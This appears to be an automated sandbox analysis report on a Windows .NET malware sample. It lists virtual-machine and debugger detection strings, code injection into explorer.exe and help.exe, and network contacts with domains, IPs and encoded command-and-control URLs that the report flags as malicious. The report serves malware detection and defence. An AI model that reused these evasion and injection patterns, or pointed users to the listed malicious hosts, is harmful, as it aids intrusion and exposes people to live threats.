Source: explorer.exe, 00000005.00000000.718413023.0000000004791000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Lo==
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.718312976.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.699012653.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.699084380.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 154.214.84.117 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.intentguild.com
Source: C:\Windows\explorer.exe	Domain query: www.didyouswipe.com
Source: C:\Windows\explorer.exe	Network Connect: 104.161.84.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.uebfaushb.com

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3424			Jump to behavior

Source: explorer.exe, 00000005.00000000.708276288.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.699012653.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Users\user\Desktop\GiG35Rwmz6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.161.84.111	www.intentguild.com	United States		53755	IOFLOODUS	true
154.214.84.117	www.didyouswipe.com	Seychelles		134548	DXTL-HKDXTLTseungKwanOServiceHK	true

Analysis Report GiG35Rwmz6

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.intentguild.com/n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU	true	Avira URL Cloud: safe	unknown
http://www.didyouswipe.com/n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0	true	Avira URL Cloud: safe	unknown
www.studiooculto.com/n8ud/	true	Avira URL Cloud: safe	low

ID:	432733
Product:	CloudBasic
Start time:	17:53:16
Start date:	10.06.2021
Sample:	GiG35Rwmz6
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	b0901d0a6b90e6b371ba80e2c31ade52
SHA1:	2f175d971e4d6f4938083a78de9be10eb6ba0e05
SHA256:	08da4e7de40f2eec9cd1670e3db354d49d3101fd9ace7aaa5f99b235d2ce46ff
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%